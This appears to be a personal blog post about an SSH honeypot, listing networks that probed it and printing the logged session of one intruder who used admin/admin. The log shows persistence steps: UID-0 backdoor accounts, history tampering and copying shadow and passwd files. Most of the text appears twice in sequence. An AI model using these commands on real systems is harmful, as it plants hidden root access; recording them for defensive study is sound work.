To be or not to be - hacked - a "visitor"
It took it's time or I didn't even notice :-) before I got a visitor. And when it finaly happened it was not as exciting as I had hoped.
So where did the attempts origin from? A typical week you would see something like this:
1.93.24.0/24 | CN | DXTNET Beijing Dian-Xin-Tong Network Technologies Co., Ltd.
1.93.0.0/16 | CN | CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
1.93.0.0/16 | CN | CNIX-AP China Networks Inter-Exchange
120.194.0.0/16 | CN | CMNET-V4HENAN-AS-AP Henan Mobile Communications Co.,Ltd
120.236.0.0/16 | CN | CMNET-GUANGDONG-AP China Mobile communications corporation
122.154.0.0/16 | TH | CAT-AP The Communication Authoity of Thailand, CAT
182.73.0.0/16 | IN | BBIL-AP BHARTI Airtel Ltd.
222.33.0.0/16 | CN | CTTNET China TieTong Telecommunications Corporation
88.198.0.0/16 | DE | HETZNER-AS Hetzner Online AG
91.236.116.0/24 | NL | PORTLANE Portlane Networks AB
114.80.192.0/19 | CN | CHINANET-SH-AP China Telecom (Group)
115.236.0.0/17 | CN | CHINANET-BACKBONE No.31,Jin-rong Street
117.239.208.0/20 | IN | BSNL-NIB National Internet Backbone
123.108.108.0/22 | HK | PANGNET-AS-AP Pang International Limited-AS number
179.88.0.0/15 | BR | TELEFÔNICA BRASIL S.A
192.81.208.0/21 | US | SERVERSTACK-ASN - ServerStack, Inc.
201.249.48.0/20 | VE | CANTV Servicios, Venezuela
218.26.0.0/16 | CN | CHINA169-BACKBONE CNCGROUP China169 Backbone
222.186.30.0/24 | CN | CHINANET-JS-AS-AP AS Number for CHINANET jiangsu province backbone
60.220.0.0/14 | CN | CHINA169-BACKBONE CNCGROUP China169 Backbone
62.212.64.0/19 | NL | LEASEWEB LeaseWeb B.V.
64.251.0.0/19 | US | INFOLINK-MIA-US - Infolink
77.40.48.0/22 | RU | MARTELCOM-AS OJSC Rostelecom
78.94.0.0/17 | DE | UNITYMEDIA Unitymedia NRW GmbH
93.174.88.0/21 | NL | ECATEL-AS AS29073, Ecatel Network
And when finally some one found the provided ssh user/pwd combo of admin/admin. Is it actually possible that this is something that someone, other than me :-), makes available on the internet. Below is the sequence of comands used on the first, and only visit. Waited a good 14 days for the second visit that didnt come.
So this is what we done in the only visit.
sshd[23781]: Accepted password for admin from 78.94.37.56 port 56255 ssh2
sshd[23781]: pam_unix(sshd:session): session opened for user admin by (uid=0)
admin: admin [23820]: ls [0]
admin: admin [23820]: cat /etc/issue [0]
admin: admin [23820]: cat /etc/hosts [0]
sudo: admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/su
sudo: pam_unix(sudo:session): session opened for user root by admin(uid=0)
su[23988]: Successful su for root by root
su[23988]: + /dev/pts/1 root:root
su[23988]: pam_unix(su:session): session opened for user root by admin(uid=0)
admin: root [23989]: nano .bash_history [0]
su[23988]: pam_unix(su:session): session closed for user root
sudo: pam_unix(sudo:session): session closed for user root
admin: admin [23820]: sudo su [0]
admin: admin [23820]: passwd admin [10]
passwd[24030]: pam_unix(passwd:chauthtok): authentication failure; logname=admin uid=1001 euid=0 tty= ruser= rhost= user=admin
admin: admin [23820]: passwd admin [10]
admin: admin [23820]: passwd admin [10]
admin: admin [23820]: passwd admin [10]
admin: admin [23820]: passwd admin [10]
admin: admin [23820]: passwd admin [10]
admin: admin [23820]: passwd admin [10]
passwd[24086]: pam_unix(passwd:chauthtok): password changed for admin
gnome-keyring-daemon[24095]: Gck: gck_module_new: assertion 'funcs != NULL' failed
gnome-keyring-daemon[24095]: module_instances: assertion 'module' failed
gnome-keyring-daemon[24095]: egg_error_message: assertion 'error' failed
gnome-keyring-daemon[24095]: couldn't find secret store module: (unknown)
gnome-keyring-daemon[24095]: lookup_login_keyring: assertion 'GCK_IS_SESSION (session)' failed
gnome-keyring-daemon[24095]: create_credential: assertion 'GCK_IS_SESSION (session)' failed
gnome-keyring-daemon[24095]: egg_error_message: assertion 'error' failed
gnome-keyring-daemon[24095]: couldn't create new login credential: (unknown)
passwd[24086]: gkr-pam: couldn't change password for the login keyring: the passwords didn't match.
admin: admin [23820]: passwd [0]
sudo: admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/su
sudo: pam_unix(sudo:session): session opened for user root by admin(uid=0)
su[24165]: Successful su for root by root
su[24165]: Successful su for root by root
su[24165]: + /dev/pts/1 root:root
su[24165]: pam_unix(su:session): session opened for user root by admin(uid=0)
admin: root [24166]: nano .bash_history [0]
admin: root [24166]: nano .bash_history [130]
admin: root [24166]: history [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: cat .bash_history [0]
admin: root [24166]: rm -rf .sudo_as_admin_successful [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: ls -la [130]
admin: root [24166]: cd [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: cat .bash_history [0]
admin: root [24166]: nano /bin/h [0]
admin: root [24166]: chmod +x /bin/h [0]
admin: root [24166]: h [1]
useradd[24348]: new group: name=http, GID=1002
useradd[24348]: new user: name=http, UID=0, GID=1002, home=/home/http, shell=/bin/sh
admin: root [24166]: /usr/sbin/useradd -o -u 0 http [0]
passwd[24361]: pam_unix(passwd:chauthtok): password changed for http
passwd[24361]: gkr-pam: couldn't update the login keyring password: no old password was entered
admin: root [24166]: passwd http [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: cat /etc/passwd [0]
admin: root [24166]: cat /etc/gshadow [0]
admin: root [24166]: cat /etc/group [0]
admin: root [24166]: passwd shadow [1]
admin: root [24166]: passwd shadow [130]
useradd[24491]: failed adding user 'http', data deleted
admin: root [24166]: /usr/sbin/useradd -o -u 0 http [9]
useradd[24500]: failed adding user 'shadow', data deleted
admin: root [24166]: /usr/sbin/useradd -o -u 0 shadow [9]
admin: root [24166]: /usr/sbin/useradd -o -u 0 shadow [130]
admin: root [24166]: passwd shadow [1]
admin: root [24166]: cat /etc/passwd [0]
admin: root [24166]: paswd libuuid [127]
passwd[24546]: pam_unix(passwd:chauthtok): password changed for libuuid
passwd[24546]: gkr-pam: couldn't update the login keyring password: no old password was entered
admin: root [24166]: passwd libuuid [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: history [0]
admin: root [24166]: [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: ls -la /var/backups/ [0]
admin: root [24166]: cp /etc/shadow /var/backups/shadow.bak [0]
admin: root [24166]: cp /etc/passwd /var/backups/passwd.bak [0]
admin: root [24166]: cp /etc/gshadow /var/backups/gshadow.bak [0]
admin: root [24166]: cp /etc/group /var/backups/group.bak [0]
admin: root [24166]: cp /etc/group /var/backups/group.bak [0]
admin: root [24166]: cp /etc/gshadow /etc/gshadow- [0]
admin: root [24166]: cp /etc/shadow /etc/shadow- [0]
admin: root [24166]: cp /etc/group /etc/group- [0]
admin: root [24166]: cp /etc/passwd /etc/passwd- [0]
admin: root [24166]: ls -la /var/backups/ [0]
su[24165]: pam_unix(su:session): session closed for user root sudo: pam_unix(sudo:session): session closed for user root
admin: admin [23820]: sudo su [0]
sshd[23781]: syslogin_perform_logout: logout() returned an error N
1.93.24.0/24 | CN | DXTNET Beijing Dian-Xin-Tong Network Technologies Co., Ltd.
1.93.0.0/16 | CN | CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
1.93.0.0/16 | CN | CNIX-AP China Networks Inter-Exchange
120.194.0.0/16 | CN | CMNET-V4HENAN-AS-AP Henan Mobile Communications Co.,Ltd
120.236.0.0/16 | CN | CMNET-GUANGDONG-AP China Mobile communications corporation
122.154.0.0/16 | TH | CAT-AP The Communication Authoity of Thailand, CAT
182.73.0.0/16 | IN | BBIL-AP BHARTI Airtel Ltd.
222.33.0.0/16 | CN | CTTNET China TieTong Telecommunications Corporation
88.198.0.0/16 | DE | HETZNER-AS Hetzner Online AG
91.236.116.0/24 | NL | PORTLANE Portlane Networks AB
114.80.192.0/19 | CN | CHINANET-SH-AP China Telecom (Group)
115.236.0.0/17 | CN | CHINANET-BACKBONE No.31,Jin-rong Street
117.239.208.0/20 | IN | BSNL-NIB National Internet Backbone
123.108.108.0/22 | HK | PANGNET-AS-AP Pang International Limited-AS number
179.88.0.0/15 | BR | TELEFÔNICA BRASIL S.A
192.81.208.0/21 | US | SERVERSTACK-ASN - ServerStack, Inc.
201.249.48.0/20 | VE | CANTV Servicios, Venezuela
218.26.0.0/16 | CN | CHINA169-BACKBONE CNCGROUP China169 Backbone
222.186.30.0/24 | CN | CHINANET-JS-AS-AP AS Number for CHINANET jiangsu province backbone
60.220.0.0/14 | CN | CHINA169-BACKBONE CNCGROUP China169 Backbone
62.212.64.0/19 | NL | LEASEWEB LeaseWeb B.V.
64.251.0.0/19 | US | INFOLINK-MIA-US - Infolink
77.40.48.0/22 | RU | MARTELCOM-AS OJSC Rostelecom
78.94.0.0/17 | DE | UNITYMEDIA Unitymedia NRW GmbH
93.174.88.0/21 | NL | ECATEL-AS AS29073, Ecatel Network
And when finally some one found the provided ssh user/pwd combo of admin/admin. Is it actually possible that this is something that someone, other than me :-), makes available on the internet. Below is the sequence of comands used on the first, and only visit. Waited a good 14 days for the second visit that didnt come.
So this is what we done in the only visit.
sshd[23781]: Accepted password for admin from 78.94.37.56 port 56255 ssh2
sshd[23781]: pam_unix(sshd:session): session opened for user admin by (uid=0)
admin: admin [23820]: ls [0]
admin: admin [23820]: cat /etc/issue [0]
admin: admin [23820]: cat /etc/hosts [0]
sudo: admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/su
sudo: pam_unix(sudo:session): session opened for user root by admin(uid=0)
su[23988]: Successful su for root by root
su[23988]: + /dev/pts/1 root:root
su[23988]: pam_unix(su:session): session opened for user root by admin(uid=0)
admin: root [23989]: nano .bash_history [0]
su[23988]: pam_unix(su:session): session closed for user root
sudo: pam_unix(sudo:session): session closed for user root
admin: admin [23820]: sudo su [0]
admin: admin [23820]: passwd admin [10]
passwd[24030]: pam_unix(passwd:chauthtok): authentication failure; logname=admin uid=1001 euid=0 tty= ruser= rhost= user=admin
admin: admin [23820]: passwd admin [10]
admin: admin [23820]: passwd admin [10]
admin: admin [23820]: passwd admin [10]
admin: admin [23820]: passwd admin [10]
admin: admin [23820]: passwd admin [10]
admin: admin [23820]: passwd admin [10]
passwd[24086]: pam_unix(passwd:chauthtok): password changed for admin
gnome-keyring-daemon[24095]: Gck: gck_module_new: assertion 'funcs != NULL' failed
gnome-keyring-daemon[24095]: module_instances: assertion 'module' failed
gnome-keyring-daemon[24095]: egg_error_message: assertion 'error' failed
gnome-keyring-daemon[24095]: couldn't find secret store module: (unknown)
gnome-keyring-daemon[24095]: lookup_login_keyring: assertion 'GCK_IS_SESSION (session)' failed
gnome-keyring-daemon[24095]: create_credential: assertion 'GCK_IS_SESSION (session)' failed
gnome-keyring-daemon[24095]: egg_error_message: assertion 'error' failed
gnome-keyring-daemon[24095]: couldn't create new login credential: (unknown)
passwd[24086]: gkr-pam: couldn't change password for the login keyring: the passwords didn't match.
admin: admin [23820]: passwd [0]
sudo: admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/su
sudo: pam_unix(sudo:session): session opened for user root by admin(uid=0)
su[24165]: Successful su for root by root
su[24165]: Successful su for root by root
su[24165]: + /dev/pts/1 root:root
su[24165]: pam_unix(su:session): session opened for user root by admin(uid=0)
admin: root [24166]: nano .bash_history [0]
admin: root [24166]: nano .bash_history [130]
admin: root [24166]: history [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: cat .bash_history [0]
admin: root [24166]: rm -rf .sudo_as_admin_successful [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: ls -la [130]
admin: root [24166]: cd [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: cat .bash_history [0]
admin: root [24166]: nano /bin/h [0]
admin: root [24166]: chmod +x /bin/h [0]
admin: root [24166]: h [1]
useradd[24348]: new group: name=http, GID=1002
useradd[24348]: new user: name=http, UID=0, GID=1002, home=/home/http, shell=/bin/sh
admin: root [24166]: /usr/sbin/useradd -o -u 0 http [0]
passwd[24361]: pam_unix(passwd:chauthtok): password changed for http
passwd[24361]: gkr-pam: couldn't update the login keyring password: no old password was entered
admin: root [24166]: passwd http [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: cat /etc/passwd [0]
admin: root [24166]: cat /etc/gshadow [0]
admin: root [24166]: cat /etc/group [0]
admin: root [24166]: passwd shadow [1]
admin: root [24166]: passwd shadow [130]
useradd[24491]: failed adding user 'http', data deleted
admin: root [24166]: /usr/sbin/useradd -o -u 0 http [9]
useradd[24500]: failed adding user 'shadow', data deleted
admin: root [24166]: /usr/sbin/useradd -o -u 0 shadow [9]
admin: root [24166]: /usr/sbin/useradd -o -u 0 shadow [130]
admin: root [24166]: passwd shadow [1]
admin: root [24166]: cat /etc/passwd [0]
admin: root [24166]: paswd libuuid [127]
passwd[24546]: pam_unix(passwd:chauthtok): password changed for libuuid
passwd[24546]: gkr-pam: couldn't update the login keyring password: no old password was entered
admin: root [24166]: passwd libuuid [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: history [0]
admin: root [24166]: [0]
admin: root [24166]: ls -la [0]
admin: root [24166]: ls -la /var/backups/ [0]
admin: root [24166]: cp /etc/shadow /var/backups/shadow.bak [0]
admin: root [24166]: cp /etc/passwd /var/backups/passwd.bak [0]
admin: root [24166]: cp /etc/gshadow /var/backups/gshadow.bak [0]
admin: root [24166]: cp /etc/group /var/backups/group.bak [0]
admin: root [24166]: cp /etc/group /var/backups/group.bak [0]
admin: root [24166]: cp /etc/gshadow /etc/gshadow- [0]
admin: root [24166]: cp /etc/shadow /etc/shadow- [0]
admin: root [24166]: cp /etc/group /etc/group- [0]
admin: root [24166]: cp /etc/passwd /etc/passwd- [0]
admin: root [24166]: ls -la /var/backups/ [0]
su[24165]: pam_unix(su:session): session closed for user root sudo: pam_unix(sudo:session): session closed for user root
admin: admin [23820]: sudo su [0]
sshd[23781]: syslogin_perform_logout: logout() returned an error N
Comments